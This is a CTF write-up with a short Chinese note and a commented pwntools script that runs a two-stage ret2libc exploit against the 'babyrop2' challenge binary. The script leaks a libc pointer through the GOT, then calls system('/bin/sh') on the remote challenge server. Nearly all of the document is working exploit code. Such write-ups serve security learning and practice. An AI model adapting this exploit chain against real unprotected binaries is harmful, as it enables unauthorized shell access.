ret2libc。记一下：因为这里的 libc 版本为 libc6_2.27-3ubuntu1.2_amd64，printf() 的 plt 表地址结尾为 f00，最低字节是 0x00，作为字符串输出时会在此处截断，所以不能用 printf() 泄露。可以改用 __libc_start_main 来泄露。

# Two-stage ret2libc against the CTF binary ./babyrop2 (pwntools, Python 2
# idioms: str + p64() bytes concatenation and .next() on a generator).
# Stage 1 leaks a libc pointer through the GOT, stage 2 calls system("/bin/sh").
# From a hardening point of view the chain depends on three absent mitigations:
# no stack canary (the saved return address is overwritten by a fixed-offset
# write), a non-PIE binary (main and the gadget are hard-coded 0x4006xx
# constants), and readable GOT entries that reveal the libc load address.
from pwn import *
elf = ELF('./babyrop2')
# local == 1: spawn the binary and use the host libc; otherwise connect to
# the challenge server and use the libc shipped with the challenge, since the
# offsets subtracted below are only valid for that exact libc build.
local = 0
if local == 1:
    io = process('./babyrop2')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('node4.buuoj.cn',25717)
    libc = ELF('libc.so.6')
# Addresses taken from the binary's own PLT/GOT tables.
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']   # read but not used: see the note at the top of the page
libc_start_main = elf.got['__libc_start_main']  # GOT slot whose contents are leaked
# Hard-coded, non-PIE addresses: main (to return into it after the leak) and,
# judging by the name, a `pop rdi; ret` gadget - TODO confirm against the binary.
main_addr = 0x400636
rdi_ret = 0x0000000000400733
# Stage 1: 0x20 bytes of filler to reach the saved rbp (overwritten with the
# marker 0xdeadbeef), then the chain
#   pop rdi; ret -> rdi = &GOT[__libc_start_main] -> printf(rdi) -> main
# so printf prints the GOT contents as a string and the program restarts.
payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(libc_start_main)+p64(printf_plt)+p64(main_addr)
io.sendline(payload)
io.recvline()   # skip the program's own output line before the leaked bytes
# A user-space x86-64 pointer fits in 6 bytes; pad to 8 for u64().
libc_start_main_addr = u64(io.recv(6)+'\x00\x00')
# libc base = leaked runtime address - symbol offset inside this libc build.
libc_base = libc_start_main_addr - libc.symbols['__libc_start_main']
log.success("libc_base:"+hex(libc_base))
# Stage 2: resolve system() and a "/bin/sh" string relative to the base.
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh').next()
# Same overflow layout as stage 1: pop rdi; ret -> rdi = "/bin/sh" -> system.
payload = 'a'*0x20+p64(0xdeadbeef)+p64(rdi_ret)+p64(binsh)+p64(system_addr)
io.sendline(payload)
io.interactive()